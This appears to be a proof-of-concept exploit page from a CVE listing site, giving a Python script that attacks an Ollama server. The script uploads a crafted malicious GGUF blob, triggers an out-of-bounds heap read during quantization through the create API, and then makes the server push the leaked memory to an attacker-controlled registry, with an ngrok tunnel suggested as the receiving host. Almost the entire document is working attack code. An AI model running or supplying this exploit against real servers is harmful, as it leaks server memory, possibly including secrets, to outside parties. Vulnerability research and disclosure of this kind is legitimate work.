5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
import requests
import hashlib
import sys
import os

os.environ["NO_PROXY"] = "*"

# Configuration
TARGET_URL = os.getenv("TARGET_URL", "http://localhost:11434")
GGUF_FILE = "malicious.gguf"
EXFIL_REGISTRY = os.getenv("EXFIL_REGISTRY", "http://localhost") # make sure it's not :port number, otherwise Windows will fail to create the directory because of the colon. Use an HTTP ngrok tunnel (e.g., something.ngrok-free.app) or an IP hosting on port 80.

def get_sha256(filepath):
    sha256_hash = hashlib.sha256()
    with open(filepath, "rb") as f:
        for byte_block in iter(lambda: f.read(4096), b""):
            sha256_hash.update(byte_block)
    return sha256_hash.hexdigest()

def exploit(iter_num=0):
    if not os.path.exists(GGUF_FILE):
        print(f"[-] {GGUF_FILE} not found. Run the forge script first.")
        sys.exit(1)

    # Use unique model name per iteration to bypass cache
    model_name = f"{EXFIL_REGISTRY}/attacker/leak_model_{iter_num}"

    print(f"\n[*] --- Exfiltration Iteration {iter_num} ---")
    print(f"[*] Target Ollama: {TARGET_URL}")
    print(f"[*] Exfil Registry: {EXFIL_REGISTRY}")
    
    file_hash = get_sha256(GGUF_FILE)
    print(f"[*] Payload SHA256: {file_hash}")

    # Stage 1: Upload the malicious blob
    print("[*] Stage 1: Uploading malicious blob...")
    with open(GGUF_FILE, "rb") as f:
        blob_url = f"{TARGET_URL}/api/blobs/sha256:{file_hash}"
        # We do a HEAD request first as Ollama sometimes requires it to initialize the upload stream
        requests.head(blob_url) 
        res = requests.post(blob_url, data=f)
        if res.status_code not in (200, 201):
            print(f"[-] Blob upload failed: {res.text}")
            sys.exit(1)
        print("[+] Blob uploaded successfully.")

    # Stage 2: Trigger Out-of-Bounds Read (Quantization)
    print(f"[*] Stage 2: Triggering quantization memory corruption...")

    create_payload = {
        "model": model_name,
        "modelfile": "FROM malicious.gguf\n",  # The actual Modelfile instruction
        "files": {
            "malicious.gguf": f"sha256:{file_hash}"  # Maps the instruction to our blob
        },
        "quantize": "Q4_K_M",
        "stream": False
    }


    
    res = requests.post(f"{TARGET_URL}/api/create", json=create_payload)
    if res.status_code != 200:
        print(f"[-] Exploit failed during creation: {res.text}")
        sys.exit(1)
    
    print("[+] Model created! Heap memory has been successfully captured into the artifact.")

    # Stage 3: Exfiltrate the memory
    print(f"[*] Stage 3: Forcing server to push leaked memory to our registry...")
    push_payload = {
        "name": model_name,
        "insecure": True, # Required to push to our unencrypted HTTP Docker registry
        "stream": False
    }
    
    res = requests.post(f"{TARGET_URL}/api/push", json=push_payload)
    if res.status_code == 200:
        print("[+] ==================================================")
        print("[+] EXFILTRATION COMPLETE!")
        print(f"[+] The server's heap memory has been pushed to {EXFIL_REGISTRY}")
        print("[+] ==================================================")
    else:
        print(f"[-] Push failed: {res.text}")

if __name__ == "__main__":
    import time
    iterations = 1  # Number of iterations to run
    for i in range(iterations):
        exploit(i)
        if i < iterations - 1:
            print("[*] Waiting 2 seconds before next exfiltration...")
            time.sleep(2)
            
    print("\n[+] All iterations complete. You can now use extractor.py to read exfils/ directory.")